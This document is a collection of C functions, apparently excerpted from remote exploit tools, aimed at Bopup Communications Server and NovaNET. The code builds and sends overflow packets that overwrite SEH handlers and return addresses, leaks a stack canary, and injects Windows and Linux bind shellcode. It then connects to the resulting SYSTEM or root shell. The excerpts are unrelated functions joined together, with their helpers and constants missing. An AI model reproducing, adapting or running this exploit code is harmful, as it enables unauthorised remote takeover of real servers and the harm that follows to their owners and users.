int main (int argc, char **argv) { char zbuf[BUF_SIZE]; int fd, n; printf ("Bopup Communications Server remote SYSTEM exploit\n" "by: <*****@*****.**>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); if (argc <= 1) { fprintf (stderr, "Usage: %s <host>\n", argv[0]); exit (EXIT_SUCCESS); } fd = sockami (argv[1], PORT_BOPUP); if (fd == -1) { fprintf (stderr, "%s: sockami failed\n", argv[0]); exit (EXIT_FAILURE); } printf ("* connected to %s:%d\n\n", argv[1], PORT_BOPUP); printf ("** SEH offset @+%04X\n", BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8); printf ("** return addy @0x%08X\n\n", BOPUP_POPRET); printf ("* building buffer with shellcode..."); zbuffami (zbuf); printf ("done\n"); printf ("* sending request..."); if ((n = sock_send (fd, zbuf, BOPUP_STR_OFFSET + BOPUP_STR_LEN)) != BOPUP_STR_OFFSET + BOPUP_STR_LEN) { fprintf (stderr, "%s: sock_send returned %d (!= %d)\n", argv[0], n, BOPUP_STR_OFFSET + BOPUP_STR_LEN); exit (EXIT_FAILURE); } printf ("done\n"); close (fd); printf ("* waiting for the shellcode to be executed...\n"); sleep (2); if ((fd = sockami (argv[1], PORT_SHELL)) != -1) { printf ("+Wh00t!\n\n"); shellami (fd); } return (EXIT_SUCCESS); }
void keep_clz(void) { int sock; if(host[0] != 0) { printf("+Causing an auth request to our fake_identd\n"); sock = sockami2(host, MY_PORT, THEIR_PORT); printf(" done\n"); close(sock); printf("+Enjoy your root shell...\n 0x69 =)\n"); sleep(1); sock = sockami2(host, 6969, 30464); shellami(sock); } }
static void novanet_own_process (char *thost, char *d_name, int esp_val) { char rbuf_pkt[NOVANET_PKT_SZ], *ptr; int canary_val, fd, n, rlen; if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0) { fprintf (stderr, "novanet_own_process: reading canary failed\n"); exit (EXIT_FAILURE); } fd = sockami (thost, NOVANET_TCP_PORT); if (fd == -1) { fprintf (stderr, "novanet_own_process: sockami failed\n"); exit (EXIT_FAILURE); } printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val); if (HAS_NULL (CANARY_VAL(canary_val, esp_val))) { fprintf (stderr, "novanet_own_process: canary value invalid :(\n"); exit (EXIT_FAILURE); } printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT); memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ); printf ("** sending login packet..."); if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ) { fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_PKT_SZ); exit (EXIT_FAILURE); } printf ("done\n"); printf ("** reading fourth packet..."); if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ) { fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n", n, NOVANET_PKT_SZ); exit (EXIT_FAILURE); } printf ("done\n"); rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1; *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ; printf ("** sending remaining %d-bytes packet...", rlen); if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ) { fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_HDR_SZ); exit (EXIT_FAILURE); } printf ("done\n"); printf ("** sending hammer packet..."); ptr = malloc (rlen * sizeof (char)); memset (ptr, 0x41, rlen); *(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val); *(unsigned int *) &ptr[0x108] = NTDLL_ESP; memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1); ptr[rlen - 1] = '\0'; if ((n = sock_send (fd, ptr, rlen)) != rlen) { fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, rlen); exit (EXIT_FAILURE); } free (ptr); printf ("done\n\n"); usleep (USLEEP_TIME); close (fd); printf ("* waiting for the shellcode to be executed...\n"); sleep (2); if ((fd = sockami (thost, PORT_SHELL)) != -1) { printf ("+Wh00t!\n\n"); shellami (fd); } }
static void novanet_own_process (char *thost, char *d_name) { char rbuf_pkt[NOVANET_PKT_SZ], *ptr; int fd, n, rlen; fd = sockami (thost, NOVANET_TCP_PORT); if (fd == -1) { fprintf (stderr, "novanet_own_process: sockami failed\n"); exit (EXIT_FAILURE); } printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT); memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ); printf ("** sending login packet..."); if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ) { fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_PKT_SZ); exit (EXIT_FAILURE); } printf ("done\n"); printf ("** reading fourth packet..."); if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ) { fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n", n, NOVANET_PKT_SZ); exit (EXIT_FAILURE); } printf ("done\n"); rlen = 0x138 + 1; *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ; printf ("** sending remaining %d-bytes packet...", rlen); if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ) { fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_HDR_SZ); exit (EXIT_FAILURE); } printf ("done\n"); printf ("** sending hammer packet..."); ptr = malloc (rlen * sizeof (char)); memset (ptr, 0x41, rlen); *(unsigned int *) &ptr[0x134] = NOVANET_POPRET; memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1); ptr[rlen - 1] = '\0'; if ((n = sock_send (fd, ptr, rlen)) != rlen) { fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, rlen); exit (EXIT_FAILURE); } free (ptr); printf ("done\n\n"); usleep (USLEEP_TIME); close (fd); printf ("* waiting for the shellcode to be executed...\n"); sleep (2); if ((fd = sockami (thost, PORT_SHELL)) != -1) { printf ("+Wh00t!\n\n"); shellami (fd); } }